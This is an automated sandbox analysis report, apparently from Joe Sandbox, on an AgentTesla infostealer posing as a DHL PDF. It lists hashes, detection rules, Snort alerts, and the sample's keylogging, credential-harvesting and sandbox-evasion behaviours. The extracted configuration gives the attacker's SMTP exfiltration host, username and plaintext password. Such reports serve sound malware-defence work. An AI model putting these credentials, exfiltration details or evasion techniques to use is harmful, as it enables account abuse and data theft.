Windows Analysis Report
AWB DHL#40882993049403.pdf.exe

Overview

General Information

Sample name: AWB DHL#40882993049403.pdf.exe
Analysis ID: 1466213
MD5: e31da8df37174250f302c4640f97ba15
SHA1: 8fad39b3196f439d96fb662161c868de0dc36b9c
SHA256: 92dc348193523762bc873e593467abfb04b3509f650976608e6c89436eea993f
Tags: DHLexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • AWB DHL#40882993049403.pdf.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe" MD5: E31DA8DF37174250F302C4640F97BA15)
    • RegSvcs.exe (PID: 5660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elektronikkutu.com", "Username": "info@elektronikkutu.com", "Password": "9U:e3@wpS3:U7h_V"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(truncated; the full report lists 8 entries)

Source | Rule | Description | Author | Strings
0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x32395:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x32407:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x32491:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32523:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3258d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x325ff:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32695:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32725:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
3.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
(truncated; the full report lists 13 entries)

                      System Summary

Source: Process started
Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe", CommandLine: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, NewProcessName: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, OriginalFileName: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe", ProcessId: 1984, ProcessName: AWB DHL#40882993049403.pdf.exe

Source: Network Connection
Author: frack113
Data: DestinationIp: 94.73.188.44, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5660, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
07/02/24-17:32:05.987984 | 2030171 | 49710 | 587 | TCP | A Network Trojan was detected
07/02/24-17:32:05.987984 | 2839723 | 49710 | 587 | TCP | A Network Trojan was detected
07/02/24-17:32:05.988045 | 2851779 | 49710 | 587 | TCP | A Network Trojan was detected
07/02/24-17:32:05.988045 | 2840032 | 49710 | 587 | TCP | A Network Trojan was detected
07/02/24-17:32:05.988045 | 2855542 | 49710 | 587 | TCP | A Network Trojan was detected
07/02/24-17:32:05.988045 | 2855245 | 49710 | 587 | TCP | A Network Trojan was detected

                      AV Detection

Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elektronikkutu.com", "Username": "info@elektronikkutu.com", "Password": "9U:e3@wpS3:U7h_V"}
Source: AWB DHL#40882993049403.pdf.exe | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: AWB DHL#40882993049403.pdf.exe | Joe Sandbox ML: detected
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: JJHI.pdbSHA256 source: AWB DHL#40882993049403.pdf.exe
Source: Binary string: JJHI.pdb source: AWB DHL#40882993049403.pdf.exe

                      Networking

Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49710 -> 94.73.188.44:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49710 -> 94.73.188.44:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49710 -> 94.73.188.44:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49710 -> 94.73.188.44:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49710 -> 94.73.188.44:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49710 -> 94.73.188.44:587
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.5:49710 -> 94.73.188.44:587
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 94.73.188.44
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: CIZGITR
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: mail.elektronikkutu.com
Source: AWB DHL#40882993049403.pdf.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: AWB DHL#40882993049403.pdf.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4514810650.0000000001547000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.elektronikkutu.com
Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mx-out05.natrohost.com
Source: AWB DHL#40882993049403.pdf.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087276155.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: AWB DHL#40882993049403.pdf.exe | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, xljC6U.cs | .Net Code: Qaz
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, xljC6U.cs | .Net Code: Qaz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary

Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB DHL#40882993049403.pdf.exe.64c0000.5.raw.unpack, -Module-.cs | Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: AWB DHL#40882993049403.pdf.exe, frm_login.cs | Long String: Length: 97210
Source: initial sample | Static PE information: Filename: AWB DHL#40882993049403.pdf.exe
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_02D3D5BC
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_053E6C00
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_053E0006
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_053E0040
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_053E6BF0
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A22538
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A22548
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A26728
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A2D710
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A26718
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A226DB
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A2F628
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A26168
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A26178
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A2DF80
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A26F88
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A26F78
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A209E8
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A209F8
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A2DB48
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Code function: 0_2_05A2FA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02F34AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02F33EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02F3ECE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02F3AD11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02F341F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A40CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A42CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A41FE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A41FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A56630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A5B278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A530A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A5C1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A551D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A57DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A576E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A5E3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A5591F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A50038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06A50007
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: invalid certificate
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087276155.0000000002F01000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedafe0966-c26d-4e7d-b1a5-d41abe896bab.exe4 vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2085769454.000000000104E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2090251488.00000000064C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2090623875.0000000008560000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000000.2054967991.0000000000A62000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJJHI.exe* vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedafe0966-c26d-4e7d-b1a5-d41abe896bab.exe4 vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe | Binary or memory string: OriginalFilenameJJHI.exe* vs AWB DHL#40882993049403.pdf.exe
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, 9O2OLI.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, hdYUG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, LGBZ4N2f.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, F8OmG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, Bgo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, k7FmsUgnvL.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, qO4Z9xt0en1avIDhdN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | Security API names: _0020.SetAccessControl
Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | Security API names: _0020.AddAccessRule
Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, qO4Z9xt0en1avIDhdN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | Security API names: _0020.SetAccessControl
Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AWB DHL#40882993049403.pdf.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: AWB DHL#40882993049403.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AWB DHL#40882993049403.pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000000.2054967991.0000000000A62000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO tab_grade (gId, gName) VALUES(NULL, @gName);SELECT @@IDENTITY# Add successfullyInfo%Add unsuccessfully-Grade name not changed
Source: AWB DHL#40882993049403.pdf.exe | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe"
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: JJHI.pdbSHA256 source: AWB DHL#40882993049403.pdf.exe
                      Source: Binary string: JJHI.pdb source: AWB DHL#40882993049403.pdf.exe

                      Data Obfuscation

